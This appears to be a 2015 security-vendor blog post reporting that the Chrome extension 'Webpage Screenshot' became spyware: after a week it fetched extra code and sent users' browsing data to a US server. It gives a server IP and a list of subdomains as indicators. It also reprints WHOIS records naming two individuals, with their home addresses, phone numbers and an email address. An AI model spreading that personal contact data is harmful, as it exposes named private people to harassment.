Are you ready for Webpage Screenshot, the latest Trojan horse?

Our malware labs have detected a popular extension in Google Chrome – Webpage Screenshot – that systematically collects your browsing details in order to sell them to a third party.

In Denmark alone, the extension has been downloaded by 39.289 users (see the attached screenshot) and more than 1.2 million users worldwide. At the same time, we notice a really good rating – 4.5 points from a total of 5.

The main problem with this extension, or should we say spyware, is that it collects information on a user’s traffic details and sends it to a server located in the United States.

Peter Kruse, founder of CSIS Security Group, says:

To avoid any security check or detection mechanism from Google, Webpage Screenshot includes a sleep function, so that the spyware-like behavior will not be activated right away, but a week later.

Apparently, there is an important vulnerability in how code validation is done for each extension in Google Chrome, which makes us wonder how many extensions are still out there that hide spyware.

Our research revealed that this type of spyware has affected not just normal users, but even large companies in Sweden:

The browser receives instructions to constantly send away information about what websites have been visited to a server in United States… The owner of the Webpage screenshot confirmed that he has entered a code that sends the data on which sites users visit. The aim is to “produce statistics on surfing behavior” and sell it. He says that the information is valuable commercially and he says while it’s not the users’ individual visits that are interesting, but surfing behavior on different sites together.

Where is this extension coming from?

The extension homepage is located at this address webpagescreenshot[.]info, with the following registrant information:

Registrant Name:Danny Gembom

Registrant Organization:

Registrant Street: Rehovot POB 80

Registrant City:Rehovot

Registrant State/Province:

Registrant Postal Code:38819

Registrant Country:IL

Registrant Phone:+972.542290258

It also features an email address, which makes use of the domain bubbles.co.il. This domain gives us more detailed information:

person: Aminadav Glickshein

address: Nof Ayalon P.O.B 6

address: D.N. Shimshon

address: 99785

address: Israel

phone: +972 8 9790049

e-mail: AminadavG AT gmail.com

Although the website appears to be running, when you hit the Download option, which should direct you to Google Chrome, you can notice the extension has been removed.

How does Webpage Screenshot behave?

We will present shortly the main events that occur when this extension is installed:

The user installs the extension from Google Chrome Web Store. A week later the spyware capabilities are activated, by downloading additional code from the web . This smart behavior allows the extension to evade any security check from Google, which cannot analyze the entire code and detect its spyware features. Once the extension has activated its private data collecting ability, the sensitive information that can be used to identity an individual is transmitted in the United States at the following IP address: 64.34.175.88 (Serverbeach, New York, USA). The analyzed IP address gives us a number of subdomains related to this service:

webpagescreenshot[.]info

c.webpagescreenshot[.]info

ch.webpagescreenshot[.]info

s1.webpagescreenshot[.]info

ww.webpagescreenshot[.]info

che.webpagescreenshot[.]info

ftp.webpagescreenshot[.]info

www.webpagescreenshot[.]info

cheg.webpagescreenshot[.]info

youtube.cwww.webpagescreenshot[.]info

ywww.webpagescreenshot[.]info

youtube.cowww.webpagescreenshot[.]info

yowww.webpagescreenshot[.]info

youtube.comwww.webpagescreenshot[.]info

youwww.webpagescreenshot[.]info

youtwww.webpagescreenshot[.]info

youtuwww.webpagescreenshot[.]info

youtubwww.webpagescreenshot[.]info

Our malware specialists have already blocked these IP addresses in order to protect our users.

Conclusion

Cybercriminals’ ability and imagination seem to have no limits when it comes to retrieving sensitive data and financial information.

And web browser extensions are nevertheless pieces of code, which means they have the ability to deliver malicious payloads or can prove to be “Trojan horses”, that hide spyware functions and steal personal details from users.

Though Google Chrome has moved fast and removed the extension from its web store, it is obvious that security mechanisms should be improved fast, especially when we see this extension has reached over one million users.

If you have already installed this Google Chrome extension, make sure you remove it as soon as possible. Stay Safe!

If you liked this post, you will enjoy our newsletter. Receive new articles directly in your inbox

This post was originally published by Aurelian Neagu in April 2015.